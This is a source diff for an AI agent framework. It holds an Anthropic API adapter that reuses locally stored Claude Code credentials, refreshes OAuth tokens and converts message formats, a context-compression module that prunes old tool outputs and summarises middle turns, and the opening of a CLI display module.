2. ~/.claude/.credentials.json — claudeAiOauth block (npm/legacy installs)
Returns dict with {accessToken, refreshToken?, expiresAt?} or None.
"""
# 1. Native binary (v2.x): ~/.claude.json with top-level primaryApiKey
claude_json = Path.home() / ".claude.json"
if claude_json.exists():
try:
data = json.loads(claude_json.read_text(encoding="utf-8"))
primary_key = data.get("primaryApiKey", "")
if primary_key:
return {
"accessToken": primary_key,
"refreshToken": "",
"expiresAt": 0, # Managed keys don't have a user-visible expiry
}
except (json.JSONDecodeError, OSError, IOError) as e:
logger.debug("Failed to read ~/.claude.json: %s", e)
# 2. Legacy/npm installs: ~/.claude/.credentials.json
cred_path = Path.home() / ".claude" / ".credentials.json"
if cred_path.exists():
try:
data = json.loads(cred_path.read_text(encoding="utf-8"))
oauth_data = data.get("claudeAiOauth")
if oauth_data and isinstance(oauth_data, dict):
access_token = oauth_data.get("accessToken", "")
if access_token:
return {
"accessToken": access_token,
"refreshToken": oauth_data.get("refreshToken", ""),
"expiresAt": oauth_data.get("expiresAt", 0),
}
except (json.JSONDecodeError, OSError, IOError) as e:
logger.debug("Failed to read ~/.claude/.credentials.json: %s", e)
return None
def is_claude_code_token_valid(creds: Dict[str, Any]) -> bool:
"""Check if Claude Code credentials have a non-expired access token."""
import time
expires_at = creds.get("expiresAt", 0)
if not expires_at:
# No expiry set (managed keys) — valid if token is present
return bool(creds.get("accessToken"))
# expiresAt is in milliseconds since epoch
now_ms = int(time.time() * 1000)
# Allow 60 seconds of buffer
return now_ms < (expires_at - 60_000)
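# Worked example: with the 60-second buffer, a token whose expiresAt is
# 1_760_000_000_000 (epoch ms) is valid only while int(time.time() * 1000)
# is below 1_759_999_940_000. A creds dict with expiresAt=0 (managed key)
# is valid whenever accessToken is non-empty.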
def _refresh_oauth_token(creds: Dict[str, Any]) -> Optional[str]:
"""Attempt to refresh an expired Claude Code OAuth token.
Uses the same token endpoint and client_id as Claude Code / OpenCode.
Only works for credentials that have a refresh token (from claude /login
or claude setup-token with OAuth flow).
Returns the new access token, or None if refresh fails.
"""
import urllib.parse
import urllib.request
refresh_token = creds.get("refreshToken", "")
if not refresh_token:
logger.debug("No refresh token available — cannot refresh")
return None
# Client ID used by Claude Code's OAuth flow
CLIENT_ID = "9d1c250a-e61b-44d9-88ed-5944d1962f5e"
data = urllib.parse.urlencode({
"grant_type": "refresh_token",
"refresh_token": refresh_token,
"client_id": CLIENT_ID,
}).encode()
req = urllib.request.Request(
"https://console.anthropic.com/v1/oauth/token",
data=data,
headers={"Content-Type": "application/x-www-form-urlencoded"},
method="POST",
)
try:
with urllib.request.urlopen(req, timeout=10) as resp:
result = json.loads(resp.read().decode())
new_access = result.get("access_token", "")
new_refresh = result.get("refresh_token", refresh_token)
expires_in = result.get("expires_in", 3600) # seconds
if new_access:
import time
new_expires_ms = int(time.time() * 1000) + (expires_in * 1000)
# Write refreshed credentials back to ~/.claude/.credentials.json
_write_claude_code_credentials(new_access, new_refresh, new_expires_ms)
logger.debug("Successfully refreshed Claude Code OAuth token")
return new_access
except Exception as e:
logger.debug("Failed to refresh Claude Code token: %s", e)
return None
def _write_claude_code_credentials(access_token: str, refresh_token: str, expires_at_ms: int) -> None:
"""Write refreshed credentials back to ~/.claude/.credentials.json."""
cred_path = Path.home() / ".claude" / ".credentials.json"
try:
# Read existing file to preserve other fields
existing = {}
if cred_path.exists():
existing = json.loads(cred_path.read_text(encoding="utf-8"))
existing["claudeAiOauth"] = {
"accessToken": access_token,
"refreshToken": refresh_token,
"expiresAt": expires_at_ms,
}
cred_path.parent.mkdir(parents=True, exist_ok=True)
cred_path.write_text(json.dumps(existing, indent=2), encoding="utf-8")
# Restrict permissions (credentials file)
cred_path.chmod(0o600)
except (OSError, IOError) as e:
logger.debug("Failed to write refreshed credentials: %s", e)
def resolve_anthropic_token() -> Optional[str]:
"""Resolve an Anthropic token from all available sources.
Priority:
1. ANTHROPIC_TOKEN env var (OAuth/setup token saved by Hermes)
2. CLAUDE_CODE_OAUTH_TOKEN env var
3. Claude Code credentials (~/.claude.json or ~/.claude/.credentials.json)
— with automatic refresh if expired and a refresh token is available
4. ANTHROPIC_API_KEY env var (regular API key, or legacy fallback)
Returns the token string or None.
"""
# 1. Hermes-managed OAuth/setup token env var
token = os.getenv("ANTHROPIC_TOKEN", "").strip()
if token:
return token
# 2. CLAUDE_CODE_OAUTH_TOKEN (used by Claude Code for setup-tokens)
cc_token = os.getenv("CLAUDE_CODE_OAUTH_TOKEN", "").strip()
if cc_token:
return cc_token
# 3. Claude Code credential file
creds = read_claude_code_credentials()
if creds and is_claude_code_token_valid(creds):
logger.debug("Using Claude Code credentials (auto-detected)")
return creds["accessToken"]
elif creds:
# Token expired — attempt to refresh
logger.debug("Claude Code credentials expired — attempting refresh")
refreshed = _refresh_oauth_token(creds)
if refreshed:
return refreshed
logger.debug("Token refresh failed — re-run 'claude setup-token' to reauthenticate")
# 4. Regular API key, or a legacy OAuth token saved in ANTHROPIC_API_KEY.
# This remains as a compatibility fallback for pre-migration Hermes configs.
api_key = os.getenv("ANTHROPIC_API_KEY", "").strip()
if api_key:
return api_key
return None
def run_oauth_setup_token() -> Optional[str]:
"""Run 'claude setup-token' interactively and return the resulting token.
Checks multiple sources after the subprocess completes:
1. Claude Code credential files (may be written by the subprocess)
2. CLAUDE_CODE_OAUTH_TOKEN / ANTHROPIC_TOKEN env vars
Returns the token string, or None if no credentials were obtained.
Raises FileNotFoundError if the 'claude' CLI is not installed.
"""
import shutil
import subprocess
claude_path = shutil.which("claude")
if not claude_path:
raise FileNotFoundError(
"The 'claude' CLI is not installed. "
"Install it with: npm install -g @anthropic-ai/claude-code"
)
# Run interactively — stdin/stdout/stderr inherited so user can interact
try:
subprocess.run([claude_path, "setup-token"])
except (KeyboardInterrupt, EOFError):
return None
# Check if credentials were saved to Claude Code's config files
creds = read_claude_code_credentials()
if creds and is_claude_code_token_valid(creds):
return creds["accessToken"]
# Check env vars that may have been set
for env_var in ("CLAUDE_CODE_OAUTH_TOKEN", "ANTHROPIC_TOKEN"):
val = os.getenv(env_var, "").strip()
if val:
return val
return None
# ---------------------------------------------------------------------------
# Message / tool / response format conversion
# ---------------------------------------------------------------------------
def normalize_model_name(model: str) -> str:
"""Normalize a model name for the Anthropic API.
- Strips 'anthropic/' prefix (OpenRouter format, case-insensitive)
- Converts dots to hyphens in version numbers (OpenRouter uses dots,
Anthropic uses hyphens: claude-opus-4.6 → claude-opus-4-6)
"""
lower = model.lower()
if lower.startswith("anthropic/"):
model = model[len("anthropic/"):]
# OpenRouter uses dots for version separators (claude-opus-4.6),
# Anthropic uses hyphens (claude-opus-4-6). Convert dots to hyphens.
model = model.replace(".", "-")
return model
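# Illustrative normalizations:
#   "anthropic/claude-opus-4.6" -> "claude-opus-4-6"
#   "Anthropic/claude-opus-4.6" -> "claude-opus-4-6" (prefix match is case-insensitive)
#   "claude-opus-4-6" -> "claude-opus-4-6" (already normalized)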
def _sanitize_tool_id(tool_id: str) -> str:
"""Sanitize a tool call ID for the Anthropic API.
Anthropic requires IDs matching [a-zA-Z0-9_-]. Replace invalid
characters with underscores and ensure non-empty.
"""
import re
if not tool_id:
return "tool_0"
sanitized = re.sub(r"[^a-zA-Z0-9_-]", "_", tool_id)
return sanitized or "tool_0"
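# Illustrative sanitizations:
#   _sanitize_tool_id("call_abc123") -> "call_abc123" (already valid)
#   _sanitize_tool_id("call.abc:123") -> "call_abc_123" (invalid chars replaced)
#   _sanitize_tool_id("") -> "tool_0" (non-empty fallback)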
def convert_tools_to_anthropic(tools: List[Dict]) -> List[Dict]:
"""Convert OpenAI tool definitions to Anthropic format."""
if not tools:
return []
result = []
for t in tools:
fn = t.get("function", {})
result.append({
"name": fn.get("name", ""),
"description": fn.get("description", ""),
"input_schema": fn.get("parameters", {"type": "object", "properties": {}}),
})
return result
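# Illustrative conversion (tool definition is a minimal example):
#   {"type": "function", "function": {"name": "read_file",
#    "description": "Read a file",
#    "parameters": {"type": "object", "properties": {"path": {"type": "string"}}}}}
# becomes
#   {"name": "read_file", "description": "Read a file",
#    "input_schema": {"type": "object", "properties": {"path": {"type": "string"}}}}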
def convert_messages_to_anthropic(
messages: List[Dict],
) -> Tuple[Optional[Any], List[Dict]]:
"""Convert OpenAI-format messages to Anthropic format.
Returns (system_prompt, anthropic_messages).
System messages are extracted since Anthropic takes them as a separate param.
system_prompt is a string or list of content blocks (when cache_control present).
"""
system = None
result = []
for m in messages:
role = m.get("role", "user")
content = m.get("content", "")
if role == "system":
if isinstance(content, list):
# Preserve cache_control markers on content blocks
has_cache = any(
p.get("cache_control") for p in content if isinstance(p, dict)
)
if has_cache:
system = [p for p in content if isinstance(p, dict)]
else:
system = "\n".join(
p["text"] for p in content if p.get("type") == "text"
)
else:
system = content
continue
if role == "assistant":
blocks = []
if content:
text = content if isinstance(content, str) else json.dumps(content)
blocks.append({"type": "text", "text": text})
for tc in m.get("tool_calls", []):
fn = tc.get("function", {})
args = fn.get("arguments", "{}")
try:
parsed_args = json.loads(args) if isinstance(args, str) else args
except (json.JSONDecodeError, ValueError):
parsed_args = {}
blocks.append({
"type": "tool_use",
"id": _sanitize_tool_id(tc.get("id", "")),
"name": fn.get("name", ""),
"input": parsed_args,
})
# Anthropic rejects empty assistant content
effective = blocks or content
if not effective or effective == "":
effective = [{"type": "text", "text": "(empty)"}]
result.append({"role": "assistant", "content": effective})
continue
if role == "tool":
# Sanitize tool_use_id and ensure non-empty content
result_content = content if isinstance(content, str) else json.dumps(content)
if not result_content:
result_content = "(no output)"
tool_result = {
"type": "tool_result",
"tool_use_id": _sanitize_tool_id(m.get("tool_call_id", "")),
"content": result_content,
}
# Merge consecutive tool results into one user message
if (
result
and result[-1]["role"] == "user"
and isinstance(result[-1]["content"], list)
and result[-1]["content"]
and result[-1]["content"][0].get("type") == "tool_result"
):
result[-1]["content"].append(tool_result)
else:
result.append({"role": "user", "content": [tool_result]})
continue
# Regular user message
result.append({"role": "user", "content": content})
# Strip orphaned tool_use blocks (no matching tool_result follows)
tool_result_ids = set()
for m in result:
if m["role"] == "user" and isinstance(m["content"], list):
for block in m["content"]:
if block.get("type") == "tool_result":
tool_result_ids.add(block.get("tool_use_id"))
for m in result:
if m["role"] == "assistant" and isinstance(m["content"], list):
m["content"] = [
b
for b in m["content"]
if b.get("type") != "tool_use" or b.get("id") in tool_result_ids
]
if not m["content"]:
m["content"] = [{"type": "text", "text": "(tool call removed)"}]
# Enforce strict role alternation (Anthropic rejects consecutive same-role messages)
fixed = []
for m in result:
if fixed and fixed[-1]["role"] == m["role"]:
if m["role"] == "user":
# Merge consecutive user messages
prev_content = fixed[-1]["content"]
curr_content = m["content"]
if isinstance(prev_content, str) and isinstance(curr_content, str):
fixed[-1]["content"] = prev_content + "\n" + curr_content
elif isinstance(prev_content, list) and isinstance(curr_content, list):
fixed[-1]["content"] = prev_content + curr_content
else:
# Mixed types — wrap string in list
if isinstance(prev_content, str):
prev_content = [{"type": "text", "text": prev_content}]
if isinstance(curr_content, str):
curr_content = [{"type": "text", "text": curr_content}]
fixed[-1]["content"] = prev_content + curr_content
else:
# Consecutive assistant messages — merge text content
prev_blocks = fixed[-1]["content"]
curr_blocks = m["content"]
if isinstance(prev_blocks, list) and isinstance(curr_blocks, list):
fixed[-1]["content"] = prev_blocks + curr_blocks
elif isinstance(prev_blocks, str) and isinstance(curr_blocks, str):
fixed[-1]["content"] = prev_blocks + "\n" + curr_blocks
else:
# Keep the later message
fixed[-1] = m
else:
fixed.append(m)
result = fixed
return system, result
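# Illustrative conversion of one tool turn (IDs and values are examples):
#   [{"role": "system", "content": "You are Hermes."},
#    {"role": "assistant", "tool_calls": [{"id": "c1",
#      "function": {"name": "read_file", "arguments": '{"path": "a.txt"}'}}]},
#    {"role": "tool", "tool_call_id": "c1", "content": "contents"}]
# yields system="You are Hermes." and messages:
#   [{"role": "assistant", "content": [{"type": "tool_use", "id": "c1",
#      "name": "read_file", "input": {"path": "a.txt"}}]},
#    {"role": "user", "content": [{"type": "tool_result",
#      "tool_use_id": "c1", "content": "contents"}]}]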
def build_anthropic_kwargs(
model: str,
messages: List[Dict],
tools: Optional[List[Dict]],
max_tokens: Optional[int],
reasoning_config: Optional[Dict[str, Any]],
tool_choice: Optional[str] = None,
) -> Dict[str, Any]:
"""Build kwargs for anthropic.messages.create()."""
system, anthropic_messages = convert_messages_to_anthropic(messages)
anthropic_tools = convert_tools_to_anthropic(tools) if tools else []
model = normalize_model_name(model)
effective_max_tokens = max_tokens or 16384
kwargs: Dict[str, Any] = {
"model": model,
"messages": anthropic_messages,
"max_tokens": effective_max_tokens,
}
if system:
kwargs["system"] = system
if anthropic_tools:
kwargs["tools"] = anthropic_tools
# Map OpenAI tool_choice to Anthropic format
if tool_choice == "auto" or tool_choice is None:
kwargs["tool_choice"] = {"type": "auto"}
elif tool_choice == "required":
kwargs["tool_choice"] = {"type": "any"}
elif tool_choice == "none":
pass # Don't send tool_choice — Anthropic will use tools if needed
elif isinstance(tool_choice, str):
# Specific tool name
kwargs["tool_choice"] = {"type": "tool", "name": tool_choice}
# Map reasoning_config to Anthropic's thinking parameter.
# Claude 4.6 models use adaptive thinking + output_config.effort.
# Older models use manual thinking with budget_tokens.
# Haiku models do NOT support extended thinking at all — skip entirely.
if reasoning_config and isinstance(reasoning_config, dict):
if reasoning_config.get("enabled") is not False and "haiku" not in model.lower():
effort = str(reasoning_config.get("effort", "medium")).lower()
budget = THINKING_BUDGET.get(effort, 8000)
if _supports_adaptive_thinking(model):
kwargs["thinking"] = {"type": "adaptive"}
kwargs["output_config"] = {
"effort": ADAPTIVE_EFFORT_MAP.get(effort, "medium")
}
else:
kwargs["thinking"] = {"type": "enabled", "budget_tokens": budget}
# Anthropic requires temperature=1 when thinking is enabled on older models
kwargs["temperature"] = 1
kwargs["max_tokens"] = max(effective_max_tokens, budget + 4096)
return kwargs
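# Worked example (hypothetical inputs): model="anthropic/claude-opus-4.5",
# max_tokens=8192, reasoning_config={"enabled": True, "effort": "high"}.
# The name normalizes to "claude-opus-4-5", which is not an adaptive-thinking
# model, so the kwargs include thinking={"type": "enabled", "budget_tokens": 16000},
# temperature=1, and max_tokens=max(8192, 16000 + 4096) = 20096.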
def normalize_anthropic_response(
response,
) -> Tuple[SimpleNamespace, str]:
"""Normalize Anthropic response to match the shape expected by AIAgent.
Returns (assistant_message, finish_reason) where assistant_message has
.content, .tool_calls, and .reasoning attributes.
"""
text_parts = []
reasoning_parts = []
tool_calls = []
for block in response.content:
if block.type == "text":
text_parts.append(block.text)
elif block.type == "thinking":
reasoning_parts.append(block.thinking)
elif block.type == "tool_use":
tool_calls.append(
SimpleNamespace(
id=block.id,
type="function",
function=SimpleNamespace(
name=block.name,
arguments=json.dumps(block.input),
),
)
)
# Map Anthropic stop_reason to OpenAI finish_reason
stop_reason_map = {
"end_turn": "stop",
"tool_use": "tool_calls",
"max_tokens": "length",
"stop_sequence": "stop",
}
finish_reason = stop_reason_map.get(response.stop_reason, "stop")
return (
SimpleNamespace(
content="\n".join(text_parts) if text_parts else None,
tool_calls=tool_calls or None,
reasoning="\n\n".join(reasoning_parts) if reasoning_parts else None,
reasoning_content=None,
reasoning_details=None,
),
finish_reason,
)
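# Illustrative normalization: a response whose blocks are thinking("..."),
# text("Hello"), and tool_use(id="t1", name="read_file", input={"path": "a.txt"})
# with stop_reason="tool_use" yields a message with content="Hello", reasoning
# set from the thinking block, one OpenAI-style tool call whose arguments are
# the JSON string '{"path": "a.txt"}', and finish_reason="tool_calls".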

1054
agent/auxiliary_client.py Normal file

File diff suppressed because it is too large

420
agent/context_compressor.py Normal file

@@ -0,0 +1,420 @@
"""Automatic context window compression for long conversations.
Self-contained class with its own OpenAI client for summarization.
Uses Gemini Flash (cheap/fast) to summarize middle turns while
protecting head and tail context.
"""
import logging
import os
from typing import Any, Dict, List, Optional, Tuple
from agent.auxiliary_client import call_llm
from agent.model_metadata import (
get_model_context_length,
estimate_messages_tokens_rough,
)
logger = logging.getLogger(__name__)
NEVER_PRUNE_TOOLS = {"clarify", "memory", "skill_view", "todo", "read_file"}
def _adaptive_prune_protect(context_length: int) -> int:
"""Scale the recent-tool-output protection window to the model context size."""
if context_length >= 500_000:
return 100_000
if context_length >= 128_000:
return 40_000
if context_length >= 64_000:
return 20_000
return 10_000
def _adaptive_prune_minimum(context_length: int) -> int:
"""Only prune when it reclaims a meaningful amount of prompt budget."""
return max(5_000, context_length // 20)
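# Worked examples of the adaptive thresholds (context sizes are illustrative):
#   context=1_000_000 -> protect 100_000 recent tool tokens, prune minimum 50_000
#   context=200_000 -> protect 40_000, prune minimum 10_000
#   context=32_000 -> protect 10_000, prune minimum 5_000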
class ContextCompressor:
"""Compresses conversation context when approaching the model's context limit.
Algorithm: protect first N + last N turns, summarize everything in between.
Token tracking uses actual counts from API responses for accuracy.
"""
def __init__(
self,
model: str,
threshold_percent: float = 0.50,
protect_first_n: int = 3,
protect_last_n: int = 4,
summary_target_tokens: int = 2500,
quiet_mode: bool = False,
summary_model_override: str = None,
base_url: str = "",
):
self.model = model
self.base_url = base_url
self.threshold_percent = threshold_percent
self.protect_first_n = protect_first_n
self.protect_last_n = protect_last_n
self.summary_target_tokens = summary_target_tokens
self.quiet_mode = quiet_mode
self.context_length = get_model_context_length(model, base_url=base_url)
self.threshold_tokens = int(self.context_length * threshold_percent)
self.compression_count = 0
self._context_probed = False # True after a step-down from context error
self.last_prompt_tokens = 0
self.last_completion_tokens = 0
self.last_total_tokens = 0
self.summary_model = summary_model_override or ""
self._prune_protect_tokens = _adaptive_prune_protect(self.context_length)
self._prune_minimum_tokens = _adaptive_prune_minimum(self.context_length)
self._prune_runway_tokens = max(self._prune_minimum_tokens, int(self.threshold_tokens * 0.15))
self._prune_target_tokens = max(0, self.threshold_tokens - self._prune_runway_tokens)
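# Worked example (hypothetical 128k-context model, default settings):
#   threshold_tokens = int(128_000 * 0.50) = 64_000
#   _prune_protect_tokens = 40_000 (128k tier)
#   _prune_minimum_tokens = max(5_000, 128_000 // 20) = 6_400
#   _prune_runway_tokens = max(6_400, int(64_000 * 0.15)) = 9_600
#   _prune_target_tokens = 64_000 - 9_600 = 54_400
# so a prune-only pass is accepted only when it lands at or below 54,400
# tokens, comfortably under the 64,000-token trigger.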
def update_from_response(self, usage: Dict[str, Any]):
"""Update tracked token usage from API response."""
self.last_prompt_tokens = usage.get("prompt_tokens", 0)
self.last_completion_tokens = usage.get("completion_tokens", 0)
self.last_total_tokens = usage.get("total_tokens", 0)
def should_compress(self, prompt_tokens: int = None) -> bool:
"""Check if context exceeds the compression threshold."""
tokens = prompt_tokens if prompt_tokens is not None else self.last_prompt_tokens
return tokens >= self.threshold_tokens
def should_compress_preflight(self, messages: List[Dict[str, Any]]) -> bool:
"""Quick pre-flight check using rough estimate (before API call)."""
rough_estimate = estimate_messages_tokens_rough(messages)
return rough_estimate >= self.threshold_tokens
def get_status(self) -> Dict[str, Any]:
"""Get current compression status for display/logging."""
return {
"last_prompt_tokens": self.last_prompt_tokens,
"threshold_tokens": self.threshold_tokens,
"context_length": self.context_length,
"usage_percent": (self.last_prompt_tokens / self.context_length * 100) if self.context_length else 0,
"compression_count": self.compression_count,
}
def _is_protected_tool(self, message: Dict[str, Any]) -> bool:
"""Return True when a tool output should never be pruned."""
return (message.get("name") or "") in NEVER_PRUNE_TOOLS
def _prune_tool_outputs(self, messages: List[Dict[str, Any]]) -> Tuple[List[Dict[str, Any]], int]:
"""Replace older middle tool outputs with compact placeholders.
Only prunes tool outputs from the same middle region that would be eligible
for summarization. The head/tail protected windows are left untouched.
Returns:
(messages_after_prune, chars_saved)
"""
n_messages = len(messages)
compress_start = self.protect_first_n
compress_end = n_messages - self.protect_last_n
if compress_start >= compress_end:
return messages, 0
compress_start = self._align_boundary_forward(messages, compress_start)
compress_end = self._align_boundary_backward(messages, compress_end)
if compress_start >= compress_end:
return messages, 0
pruned = [msg.copy() for msg in messages]
chars_saved = 0
recent_tool_tokens = 0
for i in range(compress_end - 1, compress_start - 1, -1):
msg = pruned[i]
if msg.get("role") != "tool" or self._is_protected_tool(msg):
continue
content = msg.get("content")
content_text = content if isinstance(content, str) else str(content or "")
token_estimate = max(1, len(content_text) // 4)
if recent_tool_tokens < self._prune_protect_tokens:
recent_tool_tokens += token_estimate
continue
original_len = len(content_text)
placeholder = f"[Tool output pruned — was {original_len:,} chars]"
pruned[i]["content"] = placeholder
chars_saved += max(0, original_len - len(placeholder))
tokens_saved = chars_saved // 4
if tokens_saved < self._prune_minimum_tokens:
return messages, 0
return pruned, chars_saved
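# Illustrative effect on one prunable message (sizes are examples): a
# 40,000-char web_extract output that falls outside the protected-recent
# window becomes "[Tool output pruned — was 40,000 chars]", saving roughly
# 39,960 chars (~9,990 tokens at the 4-chars-per-token estimate). If all
# eligible prunes together save less than _prune_minimum_tokens, the
# original messages are returned unchanged.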
def _generate_summary(self, turns_to_summarize: List[Dict[str, Any]]) -> Optional[str]:
"""Generate a concise summary of conversation turns.
Tries the auxiliary model first, then falls back to the user's main
model. Returns None if all attempts fail — the caller should drop
the middle turns without a summary rather than inject a useless
placeholder.
"""
parts = []
for msg in turns_to_summarize:
role = msg.get("role", "unknown")
content = msg.get("content") or ""
if len(content) > 2000:
content = content[:1000] + "\n...[truncated]...\n" + content[-500:]
tool_calls = msg.get("tool_calls", [])
if tool_calls:
tool_names = [tc.get("function", {}).get("name", "?") for tc in tool_calls if isinstance(tc, dict)]
content += f"\n[Tool calls: {', '.join(tool_names)}]"
parts.append(f"[{role.upper()}]: {content}")
content_to_summarize = "\n\n".join(parts)
prompt = f"""Summarize these conversation turns concisely. This summary will replace these turns in the conversation history.
Write from a neutral perspective describing:
1. What actions were taken (tool calls, searches, file operations)
2. Key information or results obtained
3. Important decisions or findings
4. Relevant data, file names, or outputs
Keep factual and informative. Target ~{self.summary_target_tokens} tokens.
---
TURNS TO SUMMARIZE:
{content_to_summarize}
---
Write only the summary, starting with "[CONTEXT SUMMARY]:" prefix."""
# Use the centralized LLM router — handles provider resolution,
# auth, and fallback internally.
try:
call_kwargs = {
"task": "compression",
"messages": [{"role": "user", "content": prompt}],
"temperature": 0.3,
"max_tokens": self.summary_target_tokens * 2,
"timeout": 30.0,
}
if self.summary_model:
call_kwargs["model"] = self.summary_model
response = call_llm(**call_kwargs)
summary = response.choices[0].message.content.strip()
if not summary.startswith("[CONTEXT SUMMARY]:"):
summary = "[CONTEXT SUMMARY]: " + summary
return summary
except RuntimeError:
logger.warning("Context compression: no provider available for "
"summary. Middle turns will be dropped without summary.")
return None
except Exception as e:
logger.warning("Failed to generate context summary: %s", e)
return None
# ------------------------------------------------------------------
# Tool-call / tool-result pair integrity helpers
# ------------------------------------------------------------------
@staticmethod
def _get_tool_call_id(tc) -> str:
"""Extract the call ID from a tool_call entry (dict or SimpleNamespace)."""
if isinstance(tc, dict):
return tc.get("id", "")
return getattr(tc, "id", "") or ""
def _sanitize_tool_pairs(self, messages: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
"""Fix orphaned tool_call / tool_result pairs after compression.
Two failure modes:
1. A tool *result* references a call_id whose assistant tool_call was
removed (summarized/truncated). The API rejects this with
"No tool call found for function call output with call_id ...".
2. An assistant message has tool_calls whose results were dropped.
The API rejects this because every tool_call must be followed by
a tool result with the matching call_id.
This method removes orphaned results and inserts stub results for
orphaned calls so the message list is always well-formed.
"""
surviving_call_ids: set = set()
for msg in messages:
if msg.get("role") == "assistant":
for tc in msg.get("tool_calls") or []:
cid = self._get_tool_call_id(tc)
if cid:
surviving_call_ids.add(cid)
result_call_ids: set = set()
for msg in messages:
if msg.get("role") == "tool":
cid = msg.get("tool_call_id")
if cid:
result_call_ids.add(cid)
# 1. Remove tool results whose call_id has no matching assistant tool_call
orphaned_results = result_call_ids - surviving_call_ids
if orphaned_results:
messages = [
m for m in messages
if not (m.get("role") == "tool" and m.get("tool_call_id") in orphaned_results)
]
if not self.quiet_mode:
logger.info("Compression sanitizer: removed %d orphaned tool result(s)", len(orphaned_results))
# 2. Add stub results for assistant tool_calls whose results were dropped
missing_results = surviving_call_ids - result_call_ids
if missing_results:
patched: List[Dict[str, Any]] = []
for msg in messages:
patched.append(msg)
if msg.get("role") == "assistant":
for tc in msg.get("tool_calls") or []:
cid = self._get_tool_call_id(tc)
if cid in missing_results:
patched.append({
"role": "tool",
"content": "[Result from earlier conversation — see context summary above]",
"tool_call_id": cid,
})
messages = patched
if not self.quiet_mode:
logger.info("Compression sanitizer: added %d stub tool result(s)", len(missing_results))
return messages
def _align_boundary_forward(self, messages: List[Dict[str, Any]], idx: int) -> int:
"""Push a compress-start boundary forward past any orphan tool results.
If ``messages[idx]`` is a tool result, slide forward until we hit a
non-tool message so we don't start the summarised region mid-group.
"""
while idx < len(messages) and messages[idx].get("role") == "tool":
idx += 1
return idx
def _align_boundary_backward(self, messages: List[Dict[str, Any]], idx: int) -> int:
"""Pull a compress-end boundary backward to avoid splitting a
tool_call / result group.
If the message just before ``idx`` is an assistant message with
tool_calls, those tool results will start at ``idx`` and would be
separated from their parent. Move backwards to include the whole
group in the summarised region.
"""
if idx <= 0 or idx >= len(messages):
return idx
prev = messages[idx - 1]
if prev.get("role") == "assistant" and prev.get("tool_calls"):
# The results for this assistant turn sit at idx..idx+k.
# Include the assistant message in the summarised region too.
idx -= 1
return idx
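# Boundary alignment example (roles are illustrative). Given
#   [system, user, assistant(tool_calls), tool, tool, assistant, ...]
# and protect_first_n=3, the raw compress_start=3 lands on a tool result;
# _align_boundary_forward slides it to index 5 so the summarized region
# never opens with an orphaned tool result. Symmetrically, if the message
# just before compress_end is an assistant with tool_calls,
# _align_boundary_backward steps back one index so the call and its results
# stay on the same side of the boundary.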
def compress(self, messages: List[Dict[str, Any]], current_tokens: int = None) -> List[Dict[str, Any]]:
"""Compress conversation messages by summarizing middle turns.
Keeps first N + last N turns, summarizes everything in between.
After compression, orphaned tool_call / tool_result pairs are cleaned
up so the API never receives mismatched IDs.
"""
n_messages = len(messages)
if n_messages <= self.protect_first_n + self.protect_last_n + 1:
if not self.quiet_mode:
print(f"⚠️ Cannot compress: only {n_messages} messages (need > {self.protect_first_n + self.protect_last_n + 1})")
return messages
compress_start = self.protect_first_n
compress_end = n_messages - self.protect_last_n
if compress_start >= compress_end:
return messages
# Adjust boundaries to avoid splitting tool_call/result groups.
compress_start = self._align_boundary_forward(messages, compress_start)
compress_end = self._align_boundary_backward(messages, compress_end)
if compress_start >= compress_end:
return messages
display_tokens = current_tokens if current_tokens is not None else self.last_prompt_tokens or estimate_messages_tokens_rough(messages)
if not self.quiet_mode:
print(f"\n📦 Context compression triggered ({display_tokens:,} tokens ≥ {self.threshold_tokens:,} threshold)")
print(f" 📊 Model context limit: {self.context_length:,} tokens ({self.threshold_percent*100:.0f}% = {self.threshold_tokens:,})")
pruned_messages, chars_saved = self._prune_tool_outputs(messages)
if chars_saved > 0:
pruned_tokens = estimate_messages_tokens_rough(pruned_messages)
tokens_saved_phase1 = max(0, display_tokens - pruned_tokens)
if not self.quiet_mode:
print(
f" ✂️ Phase 1 (prune): removed {chars_saved:,} chars of old tool outputs "
f"(~{tokens_saved_phase1:,} tokens saved)"
)
if pruned_tokens <= self._prune_target_tokens:
self.compression_count += 1
pruned_messages = self._sanitize_tool_pairs(pruned_messages)
if not self.quiet_mode:
print(
f" ✅ Phase 1 sufficient: {n_messages}{len(pruned_messages)} messages, "
f"now {pruned_tokens:,} tokens"
)
print(f" 💡 Compression #{self.compression_count} complete (prune only — no LLM call needed)")
return pruned_messages
if not self.quiet_mode and pruned_tokens < self.threshold_tokens:
print(
f" ↪️ Phase 1 recovered tokens but not enough runway "
f"({pruned_tokens:,} > target {self._prune_target_tokens:,}); continuing to compaction"
)
messages = pruned_messages
n_messages = len(messages)
compress_start = self.protect_first_n
compress_end = n_messages - self.protect_last_n
if compress_start >= compress_end:
return messages
compress_start = self._align_boundary_forward(messages, compress_start)
compress_end = self._align_boundary_backward(messages, compress_end)
if compress_start >= compress_end:
return messages
turns_to_summarize = messages[compress_start:compress_end]
if not self.quiet_mode:
print(f" 🗜️ Summarizing turns {compress_start+1}-{compress_end} ({len(turns_to_summarize)} turns)")
summary = self._generate_summary(turns_to_summarize)
compressed = []
for i in range(compress_start):
msg = messages[i].copy()
if i == 0 and msg.get("role") == "system" and self.compression_count == 0:
msg["content"] = (msg.get("content") or "") + "\n\n[Note: Some earlier conversation turns may be summarized to preserve context space.]"
compressed.append(msg)
if summary:
last_head_role = messages[compress_start - 1].get("role", "user") if compress_start > 0 else "user"
summary_role = "user" if last_head_role in ("assistant", "tool") else "assistant"
compressed.append({"role": summary_role, "content": summary})
else:
if not self.quiet_mode:
print(" ⚠️ No summary model available — middle turns dropped without summary")
for i in range(compress_end, n_messages):
compressed.append(messages[i].copy())
self.compression_count += 1
compressed = self._sanitize_tool_pairs(compressed)
if not self.quiet_mode:
new_estimate = estimate_messages_tokens_rough(compressed)
saved_estimate = display_tokens - new_estimate
print(f" ✅ Compressed: {n_messages}{len(compressed)} messages (~{saved_estimate:,} tokens saved)")
print(f" 💡 Compression #{self.compression_count} complete")
return compressed

585
agent/display.py Normal file

@@ -0,0 +1,585 @@
"""CLI presentation -- spinner, kawaii faces, tool preview formatting.
Pure display functions and classes with no AIAgent dependency.
Used by AIAgent._execute_tool_calls for CLI feedback.
"""
import json
import logging
import os
import sys
import threading
import time
# ANSI escape codes for coloring tool failure indicators
_RED = "\033[31m"
_RESET = "\033[0m"
logger = logging.getLogger(__name__)
# =========================================================================
# Skin-aware helpers (lazy import to avoid circular deps)
# =========================================================================
def _get_skin():
"""Get the active skin config, or None if not available."""
try:
from hermes_cli.skin_engine import get_active_skin
return get_active_skin()
